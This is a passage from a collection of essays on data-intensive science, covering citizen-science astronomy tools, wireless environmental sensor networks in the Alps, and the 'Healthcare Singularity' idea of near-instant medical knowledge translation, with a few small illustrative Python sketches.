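        for user, label in galaxy_votes:
            weight[label] += user_accuracy.get(user, 0.5)  # unknown users get 0.5
        label = max(weight, key=weight.get)
        confidence = weight[label] / sum(weight.values())
        return label, confidence

    for gid, gvotes in votes.items():
        print(gid, consensus(gvotes))

With many independent votes per galaxy, even a pool of imperfect classifiers can reach expert-level accuracy, which is the effect reported above.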
Hopping from tour to tour will be like surfing from Web page to Web page now. But the power of WWT goes far beyond its standalone ability. It is, and will continue to be, part of an ecosystem of online astronomy that will speed the progress of both citizen and professional science in the coming years.

FIGURE 1. WorldWide Telescope view of the 30 Doradus region near the Large Magellanic Cloud. Image courtesy of the National Optical Astronomy Observatory/National Science Foundation.

Microsoft, through WWT, and Google, through Google Sky, have both created API (application programming interface) environments that allow the sky-browsing software to function inside a Web page. These APIs facilitate the creation of everything from educational environments for children to citizen science sites and data distribution sites for professional astronomical surveys. Tools such as Galaxy Zoo are now easy to implement, thanks to APIs. So it now falls to the astronomical and educational communities to capitalize on the public's willingness to help navigate the increasing influx of data. High-school students can now use satellite data that no one has yet analyzed to make real discoveries about the Universe, rather than just sliding blocks down inclined planes in their physics class. Amateur astronomers can gather data on demand to fill in missing information that students, professionals, and other astronomers ask for online. The collaborative and educational possibilities are truly limitless. The role of WWT and tools like it in the professional astronomy community will also continue to expand. WWT in particular has already become a better way to access all-sky surveys than any extant professional tool. WWT, as part of international virtual observatory efforts, is being seamlessly linked to quantitative and research tools that astronomers are accustomed to, in order to provide a beautiful contextual viewer for information that is usually served only piecemeal. And it has already begun to restore the kinds of holistic views of data that astronomers were used to before the Digital Age chopped up the sky into so many small pieces and incompatible formats.

Growing Computational Power

In 10 years, multi-core processors will enhance commodity computing power two to three orders of magnitude beyond today's computers. How will all this computing power help to address the data deluge? Faster computers and increased storage and bandwidth will of course enable our contemporary approaches to scale to larger datasets. In addition, fully new ways of handling and analyzing data will be enabled. For example, computer vision techniques are already surfacing in consumer digital cameras with face detection and recognition as common features. More computational power will allow us to triage and potentially identify unique objects, events, and data outliers as soon as they are detected and route them to citizen-scientist networks for confirmation. Engagement of citizen scientists in the alerting network for this last leg of detection can be optimized through better-designed interfaces that can transform work into play. Interfaces could potentially connect human confirmation of objects with global networks of games and simulations where real-time data is broadly distributed and integrated into real-time massive multiplayer games that seamlessly integrate the correct identification of the objects into the game's success metrics.
Such games could give kids the opportunity to raise their social stature among game-playing peers while making a meaningful contribution to science.

Visualization and Analysis for the Future

WWT offers a glimpse of the future. As the diversity and scale of collected data expand, software will have to become more sophisticated in terms of how it accesses data, while simultaneously growing more intuitive, customizable, and compatible. The way to improve tools like WWT will likely be linked to the larger challenge of how to improve the way visualization and data analysis tools can be used together in all fields, not just in astronomy. Visualization and analysis challenges are more common across scientific fields than they are different. Imagine, for example, an astronomer and a climate scientist working in parallel. Both want to study the properties of physical systems as observed within a spherical coordinate system. Both want to move seamlessly back and forth between, for example, spectral line observations of some sources at some specific positions on a sphere (e.g., to study the composition of a stellar atmosphere or the CO2 in the Earth's atmosphere), the context for those positions on the sphere, and journal articles and online discussions about these phenomena. Today, even within a discipline, scientists are often faced with many choices of how to accomplish the same subtask in analysis, but no package does all the subtasks the way they would prefer. What the future holds is the potential for scientists, or data specialists working with scientists, to design their own software by linking componentized, modular applications on demand. So, for example, the astronomer and the climate scientist could both use some generalized version of WWT as part of a separate, customized system that would link to their favorite discipline- or scientist-specific packages for tasks such as spectral-line analysis.

Conclusion

The question linking the three topics we have discussed here is, "How can we design new tools to enhance discovery in the data deluge to come in astronomy?" The answer seems to revolve around improved linkage between and among existing resources, including citizen scientists willing to help analyze data; accessible image browsers such as WWT; and more customized visualization tools that are mashed up from common components. This approach, which seeks to more seamlessly connect (and reuse) diverse components, will likely be common to many fields of science, not just astronomy, in the coming decade.

EARTH AND ENVIRONMENT

Michael Lehning, Nicholas Dawes, and Mathias Bavay (WSL Institute for Snow and Avalanche Research SLF); Marc Parlange (École Polytechnique Fédérale de Lausanne); Suman Nath and Feng Zhao (Microsoft Research)

[...] increasing. This is especially the case in mountainous regions with highly complex surfaces, the source of much of the world's fresh water and weather patterns. The amount of data required to understand and model these interactions is so massive (terabytes, and increasing) that no off-the-shelf solution allows scientists to easily manage and analyze it. This has led to rapidly growing global collaboration among environmental scientists and computer scientists to approach these problems systematically and to develop sensing and database solutions that will enable environmental scientists to conduct their next-generation experiments.
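To make the "sensing and database solutions" point slightly more concrete, here is a minimal sketch of one of the smallest pieces of such plumbing: a sensor observation record with basic metadata and a simple quality flag. The field names, station identifier, and thresholds are illustrative assumptions, not the schema of any system described in this article.

    from dataclasses import dataclass
    from datetime import datetime, timezone
    from typing import Optional

    @dataclass
    class Observation:
        station_id: str      # e.g., a wireless snow/weather station
        sensor: str          # e.g., "air_temperature_C"
        time: datetime
        value: float
        quality: str = "ok"  # "ok", "out_of_range", or "spike"

    # Illustrative physical plausibility limits per sensor type.
    LIMITS = {"air_temperature_C": (-60.0, 50.0), "snow_depth_mm": (0.0, 10000.0)}

    def quality_check(prev: Optional[Observation], obs: Observation,
                      max_step: float = 15.0) -> Observation:
        """Flag values outside plausible limits, or implausible jumps
        relative to the previous reading from the same sensor."""
        lo, hi = LIMITS.get(obs.sensor, (float("-inf"), float("inf")))
        if not lo <= obs.value <= hi:
            obs.quality = "out_of_range"
        elif prev is not None and abs(obs.value - prev.value) > max_step:
            obs.quality = "spike"
        return obs

    prev = Observation("WAN7", "air_temperature_C",
                       datetime(2008, 4, 26, 14, 0, tzinfo=timezone.utc), -3.2)
    new = Observation("WAN7", "air_temperature_C",
                      datetime(2008, 4, 26, 14, 10, tzinfo=timezone.utc), 21.5)
    print(quality_check(prev, new).quality)  # flagged as a spike

Multiplied across thousands of sensors and years of sampling, records like this are what the archiving, metadata, and quality-control challenges discussed in the following sections are about.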
The next generation of environmental science, as shown in Figure 1, is motivated by the following observations by the atmospheric science community: First, the most prominent challenge in weather and climate prediction is represented by land-atmosphere interaction processes. Second, the average effect of a patchy surface on the atmosphere can be very different from an effect that is calculated by averaging a particular surface property such as temperature or moisture [1-3], particularly in the mountains, where surface variability is typically very high. Figure 2 shows an example of this: a highly complex mountain surface with bare rocks, debris-covered permafrost, patchy snow cover, sparse trees, and shallow and deep soils with varying vegetation. All of these surface features can occur within a single kilometer, a resolution that is typically not reached by weather forecast models of even the latest generation. Existing models of weather prediction and climate change still operate using a grid resolution, which is far too coarse (multiple kilometers) to explicitly and correctly map the surface heterogeneity in the mountains (and elsewhere). This can lead to severe errors in understanding and prediction.

FIGURE 1. A typical data source context for next-generation environmental science, with a heterogeneous sensor deployment that includes (1) mobile stations, (2) high-resolution conventional weather stations, (3) full-size snow/weather stations, (4) external weather stations, (5) satellite imagery, (6) weather radar, (7) mobile weather radar, (8) stream observations, (9) citizen-supplied observations, (10) ground LIDAR, (11) aerial LIDAR, (12) nitrogen/methane measures, (13) snow hydrology and avalanche probes, (14) seismic probes, (15) distributed optical fiber temperature sensing, (16) water quality sampling, (17) stream gauging stations, (18) rapid mass movements research, (19) runoff stations, and (20) soil research.

In next-generation environmental science, data resolution will be addressed using densely deployed (typically wireless) sensor networks. Recent developments in wireless sensing have made it possible to instrument and sense the physical world with high resolution and fidelity over an extended period of time. Wireless connections enable reliable collection of data from remote sensors to send to laboratories for processing, analyzing, and archiving. Such high-resolution sensing enables scientists to understand more precisely the variability and dynamics of environmental parameters. Wireless sensing also provides scientists with safe and convenient visibility of in situ sensor deployments and allows them to enable, debug, and test the deployments from the laboratory. This helps minimize site visits, which can be costly, time-consuming, and even dangerous.

FIGURE 2. Terrestrial laser scan for snow distribution in the Swiss Alps showing typical patchy snow cover. (Snow depth in millimeters, 4/26/2008. Cartography and design: T. Grünewald. Base map: Landeskarte der Schweiz Nr. 1197, 1:25,000.)

However, dense sensor deployments in harsh, remote environments remain challenging for several reasons.
First, the whole process of sensing, computation, and communication must be extremely energy efficient so that sensors can remain operational for an extended period of time using small batteries, solar panels, or other environmental energy. Second, sensors and their communication links must be fairly robust to ensure reliable data acquisition in harsh outdoor environments. Third, invalid sensor data due to system failures or environmental impacts must be identified and treated accordingly (e.g., flagged or even filtered from the dataset). Although recent research (including the Swiss Experiment and Life Under Your Feet) partially addresses these issues, further research is needed to address them in many production systems.

High-resolution environmental sensing introduces severe data management challenges for scientists. These include reliably archiving large volumes (many terabytes) of data, sharing such data with users within access control policies, and maintaining sufficient context and provenance of sensor data using correct metadata [4]. Environmental scientists can use commercial database tools to address many of the data management and exploratory challenges associated with such a massive influx of data. For example, Microsoft's SenseWeb project [5] provides an infrastructure, including an underlying Microsoft SQL Server database, for archiving massive amounts of sensor data that might be compressed and distributed over multiple computers. SenseWeb also maintains suitable data indexes and enables efficient query processing to help users quickly explore the dataset to find features for detailed analysis [5-7]. But even with these capabilities, SenseWeb hits just the tip of the iceberg of the challenging data management tasks facing environmental scientists. Additional tools are necessary to efficiently integrate sensor data with relevant context and provide data provenance. Querying such data in a unified framework remains challenging. More research is also needed to deal with uncertain data that comes from noisy sensors and to handle the constant data flow from distributed locations.

To better understand environmental phenomena, scientists need to derive and apply various models to transform sensor data into scientific and other practical results. Database technology can help scientists to easily integrate observational data from diverse sources, possibly distributed over the Internet, with model assessments and forecasts, a procedure known as data assimilation. Sophisticated data mining techniques can allow scientists to easily explore spatiotemporal patterns of data (both interactively as well as in batch on archived data). Modeling techniques can provide correct and timely prediction of phenomena such as flooding events, landslides, or avalanche cycles, which can be highly useful for intervention and damage prevention, even with just a few hours of lead time. This very short-term forecasting is called nowcasting in meteorology. Scientists in the Swiss Experiment project have made progress in useful data assimilation and nowcasting. One case study in this project applies advanced sensors and models to forecasting alpine natural hazards [8]. A refined nowcast relies on the operational weather forecast to define the target area of a potential storm that would affect a small-scale region (a few square kilometers) in the mountains.
The operational weather forecast should allow sufficient time to install local mobile stations (such as SensorScope stations) and remote sensing devices at the target area and to set up high-resolution hazard models. In the long term, specialized weather forecast models will be developed to allow much more precise local simulation.

FIGURE 3. SensorMap showing temperature distribution overlaid on 3-D mountain terrain.

To increase the public's environmental awareness and to support decision and policy makers, useful findings from scientific experiments must be presented and disseminated in a practical fashion. For example, SenseWeb provides a Web-based front end called SensorMap that presents real-time and historical environmental factors in an easy-to-understand visual interface. It overlays spatial visualizations (such as icons showing current air pollution at a location or images showing distribution of snowfalls) over a browsable geographic map, plays the visualizations of selected environmental datasets as a movie on top of a geographic map, and shows important trends in historic environmental data as well as useful summaries of real-time environmental data. (See Figure 3.) At present, such platforms support only a limited set of visualizations, and many challenges remain to be solved to support the more advanced visualizations required by diverse audiences.

Worldwide Environmental Monitoring

We have described the next-generation environmental monitoring system as isolated, focused on a particular region of interest such as a mountain range, ice field, or forest. This is how such environmental systems are starting to be deployed. However, we foresee far more extensive monitoring systems that can allow scientists to share data with one another and combine and correlate data from millions of sensors all over the world to gain an even better understanding of global environmental patterns. Such a global-scale sensor deployment would introduce unprecedented benefits and challenges. As sensor datasets grow larger, traditional data management techniques (such as loading data into a SQL database and then querying it) will clearly prove inadequate. To avoid moving massive amounts of data around, computations will need to be distributed and pushed as close to data sources as possible [7]. To reduce the storage and communication footprint, datasets will have to be compressed without loss of fidelity. To support data analysis with reasonable latencies, computation should preferably be done over compressed data [9]. Scientific analysis will also most likely require additional metadata, such as sensor specifications, experiment setups, data provenance, and other contextual information. Data from heterogeneous sources will have to be integrated in a unified data management and exploration framework [10].

Obviously, computer science tools can enable this next-generation environmental science only if they are actually used by domain scientists. To expedite adoption by domain scientists, such tools must be intuitive, easy to use, and robust. Moreover, they cannot be one-size-fits-all tools for all domains; rather, they should be domain-specific custom tools, or at least custom variants of generic tools. Developing these tools will involve identifying the important problems that domain scientists are trying to answer, analyzing the design trade-offs, and focusing on important features.
While such application engineering approaches are common for non-science applications, they tend not to be a priority in science applications. This must change.

Conclusion

The close collaboration between environmental science and computer science is providing a new and better way to conduct scientific research through high-resolution and high-fidelity data acquisition, simplified large-scale data management, powerful data modeling and mining, and effective data sharing and visualization. In this paper, we have outlined several challenges to realizing the vision of next-generation environmental science. Some significant progress has been made in this context, such as in the Swiss Experiment and SenseWeb, in which an advanced, integrated environmental data infrastructure is being used by a variety of large environmental research projects, for environmental education, and by individual scientists. Meanwhile, dramatic progress is being made in complementary fields such as basic sensor technology. Our expectation is that all of these advances in instrumenting the Earth will help us realize the dreams of next-generation environmental science, allowing scientists, government, and the public to better understand and live safely in their environment.

References

[1] M. Bavay, M. Lehning, T. Jonas, and H. Löwe, Simulations of future snow cover and discharge in Alpine headwater catchments, Hydrol. Processes, vol. 22, pp. 95–108, 2009, doi: 10.1002/hyp.7195.
[2] M. Lehning, H. Löwe, M. Ryser, and N. Raderschall, Inhomogeneous precipitation distribution and snow transport in steep terrain, Water Resour. Res., vol. 44, 2008, doi: 10.1029/2007WR006545.
[3] N. Raderschall, M. Lehning, and C. Schär, Fine scale modelling of the boundary layer wind field over steep topography, Water Resour. Res., vol. 44, 2008, doi: 10.1029/2007WR006544.
[4] N. Dawes, A. K. Kumar, S. Michel, K. Aberer, and M. Lehning, Sensor Metadata Management and Its Application in Collaborative Environmental Research, presented at the 4th IEEE Int. Conf. e-Science, 2008.
[5] A. Kansal, S. Nath, J. Liu, and F. Zhao, SenseWeb: An Infrastructure for Shared Sensing, IEEE MultiMedia, vol. 14, no. 4, pp. 8–13, Oct. 2007, doi: 10.1109/MMUL.2007.82.
[6] Y. Ahmad and S. Nath, COLR-Tree: Communication Efficient Spatio-Temporal Index for a Sensor Data Web Portal, presented at the Int. Conf. Data Engineering, 2008, doi: 10.1.1.65.6941.
[7] A. Deshpande, S. Nath, P. B. Gibbons, and S. Seshan, Cache-and-Query for Wide Area Sensor Databases, Proc. 22nd ACM SIGMOD Int. Conf. Management of Data / Principles of Database Systems, 2003, doi: 10.1145/872757.872818.
[8] M. Lehning and C. Wilhelm, Integral Risk Management and Physical Modelling for Mountainous Natural Hazards, in Extreme Events in Nature and Society, S. Albeverio, V. Jentsch, and H. Kantz, Eds. Springer, 2005.
[9] G. Reeves, J. Liu, S. Nath, and F. Zhao, Managing Massive Time Series Streams with Multi-Scale Compressed Trickles, Proc. 35th Int. Conf. Very Large Data Bases, 2009.
[10] S. Nath, J. Liu, and F. Zhao, Challenges in Building a Portal for Sensors World-Wide, presented at the First Workshop on World-Sensor-Web, 2006, doi: 10.1109/MPRV.2007.27.

2. HEALTH AND WELLBEING

Introduction

Part 2 of this book explores the remarkable progress and challenges we are seeing in the most intimate and personal of our sciences, the one with the most immediate impact on all of us across the planet: the science of health and medicine.
The first article sets the scene. Gillam et al. describe the progress of medical science over human history and make a strong case for a convergence of technologies that will change the face of healthcare within our lifetime. The remaining articles shed light on the convergent strands that make up this larger picture, by focusing on particular medical science challenges and the technologies being developed to overcome them.

Any assertion that the coming healthcare revolution will be universal is credible only if we can demonstrate how it can cross the economic and social divides of the modern world. Robertson et al. show that a combination of globally pervasive cell phone technology and the computational technique of Bayesian networks can enable collection of computerized healthcare records in regions where medical care is sparse and can also provide automated, accurate diagnoses.

An understanding of the human brain is one of the grand challenges of medicine, and Lichtman et al. describe their approach to the generation of the vast datasets needed to understand this most complex of structures. Even imaging the human brain at the subcellular level, with its estimated 160 trillion synaptic connections, is a challenge that will test the bounds of data storage, and that is merely the first step in deducing function from form. An approach to the next stage of understanding how we think is presented by Horvitz and Kristan, who describe techniques for recording sequences of neuronal activity and correlating them with behavior in the simplest of organisms. This work will lead to a new generation of software tools, bringing techniques of machine learning/artificial intelligence to generate new insights into medical data.

While the sets of data that make up a personal medical record are orders of magnitude smaller than those describing the architecture of the brain, current trends toward universal electronic healthcare records mean that a large proportion of the global population will soon have records of their health available in a digital form. This will constitute in aggregate a dataset of a size and complexity rivaling those of neuroscience. Here we find parallel challenges and opportunities. Buchan, Winn, and Bishop apply novel machine learning techniques to this vast body of healthcare data to automate the selection of therapies that have the most desirable outcome. Technologies such as these will be needed if we are to realize the world of the Healthcare Singularity, in which the collective experience of human healthcare is used to inform clinical best practice at the speed of computation.

While the coming era of computerized health records promises more accessible and more detailed medical data, the usability of this information will require the adoption of standard forms of encoding so that inferences can be made across datasets. Cardelli and Priami look toward a future in which medical data can be overlaid onto executable models that encode the underlying logic of biological systems, to not only depict the behavior of an organism but also predict its future condition or reaction to a stimulus. In the case of neuroscience, such models may help us understand how we think; in the case of medical records, they may help us understand the mechanisms of disease and treatment.
Although the computational modeling of biological phenomena is in its infancy, it provides perhaps the most intriguing insights into the emerging complementary and synergistic relationship between computational and living systems.

HEALTH AND WELLBEING

Michael Gillam, Craig Feied, Jonathan Handler, and Eliza Moody (Microsoft); Ben Shneiderman and Catherine Plaisant (University of Maryland); Mark Smith (MedStar Health Institutes for Innovation); John Dickason (private practice)

In 1499, when Portuguese explorer Vasco da Gama returned home after completing the first-ever sea voyage from Europe to India, he had less than half of his original crew with him: scurvy had claimed the lives of 100 of the 160 men. Throughout the Age of Discovery, scurvy was the leading cause of death among sailors. Ship captains typically planned for the death of as many as half of their crew during long voyages. A dietary cause for scurvy was suspected, but no one had proved it. More than a century later, on a voyage from England to India in 1601, Captain James Lancaster placed the crew of one of his four ships on a regimen of three teaspoons of lemon juice a day. By the halfway point of the trip, almost 40% of the men (110 of 278) on three of the ships had died, while on the lemon-supplied ship, every man survived [1]. The British navy responded to this discovery by repeating the experiment, 146 years later. In 1747, a British navy physician named James Lind treated sailors suffering from scurvy using six randomized approaches and demonstrated that citrus reversed the symptoms. The British navy responded, 48 years later, by enacting new dietary guidelines requiring citrus, which virtually eradicated scurvy from the British fleet overnight. The British Board of Trade adopted similar dietary practices for the merchant fleet in 1865, an additional 70 years later. The total time from Lancaster's definitive demonstration of how to prevent scurvy to adoption across the British Empire was 264 years [2].

The translation of medical discovery to practice has thankfully improved substantially. But a 2003 report from the Institute of Medicine found that the lag between significant discovery and adoption into routine patient care still averages 17 years [3, 4]. This delayed translation of knowledge to clinical care has negative effects on both the cost and the quality of patient care. A nationwide review of 439 quality indicators found that only half of adults receive the care recommended by U.S. national standards [5].

The Impact of the Information Explosion in Medicine

Although the rate at which medical knowledge is adopted has improved significantly, we now face a new challenge: the exponential increase in the rate of medical knowledge discovery. More than 18 million articles are currently catalogued in the biomedical literature, including over 800,000 added in 2008. The accession rate has doubled every 20 years, and the number of articles per year is expected to surpass 1 million in 2012, as shown in Figure 1. Translating all of this emerging medical knowledge into practice is a staggering challenge. Five hundred years ago, Leonardo da Vinci could be a painter, engineer, musician, and scientist. One hundred years ago, it is said that a physician might have reasonably expected to know everything in the field of medicine. Today, a typical primary care doctor must stay abreast of approximately 10,000 diseases and syndromes, 3,000 medications, and 1,100 laboratory tests [6].
Research librarians estimate that a physician in just one specialty, epidemiology, needs 21 hours of study per day just to stay current [7]. Faced with this flood of medical information, clinicians routinely fall behind, despite specialization and sub-specialization [8]. The sense of information overload in medicine has been present for surprisingly many years. An 1865 speech by Dr. Henry Noyes to the American Ophthalmologic Society is revealing. He said that medical men "strive manfully to keep up their knowledge of how the world of medicine moves on; but too often they are the first to accuse themselves of being unable to meet the duties of their daily calling." He went on to say, "The preparatory work in the study of medicine is so great, if adequately done, that but few can spare time for its thorough performance." [9]

The speed at which definitive medical discoveries have broadly reached medical practice over the last two millennia has progressively increased, as shown in Figure 2 on the next page. Focusing on the last 150 years, in which the effects of industrialization and the information explosion have been most acute, the trajectory flattens slightly but remains largely linear, as the figure shows. (An asymptotic fit yields an r2 of 0.73, whereas the linear fit is 0.83.) Given that even the speed of light is finite, this trend will inevitably be asymptotic to the horizontal axis. Yet, if the linearity can be sufficiently maintained for a while, the next 20 years could emerge as a special time for healthcare as the translation from medical knowledge discovery to widespread medical practice becomes nearly instantaneous. The proximity of this trajectory to the axis occurs around the year 2025.

Figure 1. The number of biomedical articles catalogued each year is increasing precipitously and is expected to surpass 1 million in 2012.

In response to the dramatic computational progress observed with Moore's Law and the growth in parallel and distributed computing architectures, Ray Kurzweil, in The Singularity Is Near, predicts that 2045 will be the year of the Singularity, when computers meet or exceed human computational ability and when their ability to recursively improve themselves can lead to an intelligence explosion that ultimately affects all aspects of human culture and technology [10]. Mathematics defines a singularity as a point at which an object changes its nature so as to attain properties that are no longer the expected norms for that class of object. Today, the dissemination path for medical information is complex and multi-faceted, involving commercials, lectures, brochures, colleagues, and journals. In a world with nearly instantaneous knowledge translation, dissemination paths would become almost entirely digital and direct.

Figure 2. While it took 2,300 years after the first report of angina for the condition to be commonly taught in medical curricula, modern discoveries are being disseminated at an increasingly rapid pace. Focusing on the last 150 years, the trend still appears to be linear, approaching the axis around 2025.

While the ideas around a technological singularity remain controversial, the authors refer to this threshold moment, when medical knowledge becomes liquid and its flow from research to practice (bench to bedside) becomes frictionless and immediate, as the Healthcare Singularity.
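The "approaching the axis around 2025" reading of Figure 2 can be illustrated with a small sketch. The (discovery year, adoption lag) pairs below are made-up placeholders, not the dataset behind the figure; the point is only the mechanics of fitting a line to lag versus year and asking where the fitted lag reaches zero.

    import numpy as np

    # Hypothetical (year of definitive discovery, years until routine practice).
    years = np.array([1865, 1900, 1945, 1975, 1995, 2003])
    lags = np.array([150, 100, 55, 35, 25, 17])

    slope, intercept = np.polyfit(years, lags, 1)   # linear fit: lag = a*year + b
    zero_lag_year = -intercept / slope              # where the fitted lag crosses zero
    r = np.corrcoef(years, lags)[0, 1]

    print(f"fit: lag ~ {slope:.2f} * year + {intercept:.0f}  (r^2 = {r**2:.2f})")
    print(f"extrapolated zero-lag year: {zero_lag_year:.0f}")

The same caveat given in the text applies to any such extrapolation: the true curve must flatten before it reaches zero, so the fitted crossing year marks an era of near-instantaneous translation rather than a literal date.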
The Promises of a Post-Healthcare Singularity World

Rofecoxib (Vioxx) was approved as safe and effective by the U.S. Food and Drug Administration (FDA) on May 20, 1999. On September 30, 2004, Merck withdrew it from the market because of concerns about the drug's potential cardiovascular side effects. The FDA estimates that in the 5 years that the drug was on the market, rofecoxib contributed to more than 27,000 heart attacks or sudden cardiac deaths and as many as 140,000 cases of heart disease [11]. Rofecoxib was one of the most widely used medications ever withdrawn; over 80 million people had taken the drug, which was generating US$2.5 billion a year in sales. Today, it is reasonable to expect that after an FDA announcement of a drug's withdrawal from the market, patients will be informed and clinicians will immediately prescribe alternatives. But current channels of dissemination delay that response. In a post-Healthcare Singularity world, that expectation will be met.

To enable instantaneous translation, journal articles will consist of not only words, but also bits. Text will commingle with code, and articles will be considered complete only if they include algorithms. With this knowledge automation, every new medication will flow through a cascade of post-market studies that are independently created and studied by leading academics across the oceans (effectively crowdsourcing quality assurance). Suspicious observations will be flagged in real time, and when certainty is reached, unsafe medications will disappear from clinical prescription systems in a rippling wave across enterprises and clinics. The biomedical information explosion will at last be contained and harnessed. Other scenarios of knowledge dissemination will be frictionless as well: medical residents can abandon the handbooks they have traditionally carried that list drugs of choice for diseases, opting instead for clinical systems that personalize healthcare and geographically regionalize treatments based on drug sensitivities that are drawn in real time from the local hospital microbiology lab and correlated with the patient's genomic profile.

Knowledge discovery will also be enhanced. Practitioners will have access to high-performance, highly accurate databases of patient records to promote preventive medical care, discover successful treatment patterns [12, 13], and reduce medical errors. Clinicians will be able to generate cause-effect hypotheses, run virtual clinical trials to deliver personalized treatment plans, and simulate interventions that can prevent pandemics. Looking farther ahead, the instantaneous flow of knowledge from research centers to the front lines of clinical care will speed the treatment and prevention of newly emerging diseases. The moment that research labs have identified the epitopes to target for a new disease outbreak, protein/DNA/RNA/lipid synthesizers placed in every big hospital around the world will receive instructions, remotely transmitted from a central authority, directing the on-site synthesis of vaccines or even directed antibody therapies for rapid administration to patients.

Progress Toward the Healthcare Singularity

Companies such as Microsoft and Google are building new technologies to enable data and knowledge liquidity. Microsoft HealthVault and Google Health are Internet-based, secure, and private consumer data clouds into which clinical patient data can be pushed from devices and other information systems. Importantly, once the data are in these patient clouds, they are owned by the patient.
Patients themselves determine what data can be redistributed and to whom the data may be released. A February 2009 study by KLAS reviewed a new class of emerging data aggregation solutions for healthcare. These enterprise data aggregation solutions (enterprise data clouds) unify data from hundreds or thousands of disparate systems (such as MEDSEEK, Carefx, dbMotion, Medicity, and Microsoft Amalga). These platforms are beginning to serve as conduits for data to fill patient data clouds. A recent example is a link between New York-Presbyterian's hospital-based Amalga aggregation system and its patients' HealthVault service. Through these links, data can flow almost instantaneously from hospitals to patients.

The emergence of consumer data clouds creates new paths by which new medical knowledge can reach patients directly. On April 21, 2009, Mayo Clinic announced the launch of the Mayo Clinic Health Advisory, a privacy- and security-enhanced online application that offers individualized health guidance and recommendations built with the clinical expertise of Mayo Clinic and using secure and private patient health data from Microsoft HealthVault. Importantly, new medical knowledge and recommendations can be computationally instantiated into the advisory and applied virtually instantaneously to patients worldwide.

New technology is bridging research labs and clinical practice. On April 28, 2009, Microsoft announced the release of Amalga Life Sciences, an extension to the data-aggregation class of products for use by scientists and researchers. Through this release, Microsoft is offering scalable data aggregation and liquidity solutions that link three audiences: patients, providers, and researchers. Companies such as Microsoft are building the pipeline to allow data and knowledge to flow through a semantically interoperable network of patients, providers, and researchers. These types of connectivity efforts hold the promise of effectively instantaneous dissemination of medical knowledge throughout the healthcare system. The Healthcare Singularity could be the gateway event to a new Age of Semantic Medicine. Instantaneous knowledge translation in medicine is not only immensely important, highly desirable, valuable, and achievable in our lifetimes, but perhaps even inevitable.

References

[1] F. Mosteller, Innovation and evaluation, Science, vol. 211, pp. 881–886, 1981, doi: 10.1126/science.6781066.
[2] J. Lind, A Treatise of the Scurvy (1753). Edinburgh: University Press, reprinted 1953.
[3] E. A. Balas, Information Systems Can Prevent Errors and Improve Quality, J. Am. Med. Inform. Assoc., vol. 8, no. 4, pp. 398–399, 2001, PMID: 11418547.
[4] A. C. Greiner and Elisa Knebel, Eds., Health Professions Education: A Bridge to Quality. Washington, D.C.: National Academies Press, 2003.
[5] E. A. McGlynn, S. M. Asch, J. Adams, J. Keesey, J. Hicks, A. DeCristofaro, et al., The quality of health care delivered to adults in the United States, N. Engl. J. Med., vol. 348, pp. 2635–2645, 2003, PMID: 12826639.
[6] T. H. Davenport and J. Glaser, Just-in-time delivery comes to knowledge management, Harv. Bus. Rev., vol. 80, no. 7, pp. 107–111, 126, July 2002, doi: 10.1225/R0207H.
[7] B. S. Alper, J. A. Hand, S. G. Elliott, S. Kinkade, M. J. Hauan, D. K. Onion, and B. M. Sklar, How much effort is needed to keep up with the literature relevant for primary care? J. Med. Libr. Assoc., vol. 92, no. 4, pp. 429–437, Oct. 2004.
[8] C. Lenfant, Clinical Research to Clinical Practice – Lost in Translation? N. Engl. J.
Med., vol. 349, pp. 868–874, 2003, PMID: 12944573.
[9] H. D. Noyes, Specialties in Medicine, June 1865.
[10] R. Kurzweil, The Singularity Is Near: When Humans Transcend Biology. New York: Penguin Group, 2005, p. 136.
[11] D. J. Graham, D. Campen, R. Hui, M. Spence, C. Cheetham, G. Levy, S. Shoor, and W. A. Ray, Risk of acute myocardial infarction and sudden cardiac death in patients treated with cyclooxygenase 2 selective and non-selective non-steroidal anti-inflammatory drugs: nested case-control study, Lancet, vol. 365, no. 9458, pp. 475–481, Feb. 5–11, 2005.
[12] C. Plaisant, S. Lam, B. Shneiderman, M. S. Smith, D. Roseman, G. Marchand, M. Gillam, C. Feied, J. Handler, and H. Rappaport, Searching Electronic Health Records for temporal patterns in patient histories: A case study with Microsoft Amalga, Proc. Am. Med. Inform. Assoc., Washington, D.C., Nov. 2008.
[13] T. Wang, C. Plaisant, A. Quinn, R. Stanchak, B. Shneiderman, and S. Murphy, Aligning temporal data by sentinel events: Discovering patterns in electronic health records, Proc. ACM CHI 2008 Human Factors in Computing Systems Conference, ACM, New York, Apr. 2008, pp. 457–466, doi: 10.1145/1357054.1357129.

HEALTH AND WELLBEING

Joel Robertson and Del DeHart (Robertson Research Institute); Kristin Tolle and David Heckerman (Microsoft Research)

Bringing intelligent healthcare informatics to bear on the dual problems of reducing healthcare costs and improving quality and outcomes is a challenge even in countries with a reasonably developed technology infrastructure. Much of medical knowledge and information remains in paper form, and even where it is digitized, it often resides in disparate datasets and repositories and in diverse formats. Data sharing is uncommon and frequently hampered by the lack of foolproof de-identification for patient privacy. All of these issues impede opportunities for data mining and analysis that would enable better predictive and preventive medicine. Developing countries face these same issues, along with the compounding effects of economic and geopolitical constraints, transportation and geographic barriers, a much more limited clinical workforce, and infrastructural challenges to delivery. Simple, high-impact deliverable interventions such as universal childhood immunization and maternal childcare are hampered by poor monitoring and reporting systems. A recent Lancet article by Christopher Murray's group concluded that immunization coverage "has improved more gradually and not to the level suggested by countries' official reports of WHO and UNICEF estimates. There is an urgent need for independent and contestable monitoring of health indicators in an era of global initiatives that are target-oriented and disburse funds based on performance." [1]
Below, we elaborate on the challenges facing healthcare delivery in developing countries and describe computer- and cell phonebased technology we have created to help address these challenges. At the core of this technology is the NxOpinion Knowledge Manager1 (NxKM), which has been under development at the Robertson Research Institute since 2002. This health platform includes a medical knowledge base assembled from the expertise of a large team of experts in the U.S. and developing countries, a diagnostic engine based on Bayesian networks, and cell phones for end-user interaction. Scale Up, Scale Out, and Scale In One of the biggest barriers to deployment of a decision support or electronic health record system is the ability to scale. The term scale up refers to a systems ability to support a large user basetypically hundreds of thousands or millions. Most systems are evaluated within a narrower scope of users. Scale out refers to a systems ability to work in multiple countries and regions as well as the ability to work across disease types. Many systems work only for one particular disease and are not easily regionalizedfor example, for local languages, regulations, and processes. Scale in refers to the ability of a system to capture and benchmark against a single 1 66 individual. Most systems assume a generic patient and fail to capture unique characteristics that can be effective in individualized treatment. With respect to scaling up, NxKM has been tested in India, Congo, Dominican Republic, Ghana, and Iraq. It has also been tested in an under-served inner-city community in the United States. In consultation with experts in database scaling, the architecture has been designed to combine multiple individual databases with a central de-identified database, thus allowing, in principle, unlimited scaling options. As for scaling out to work across many disease types and 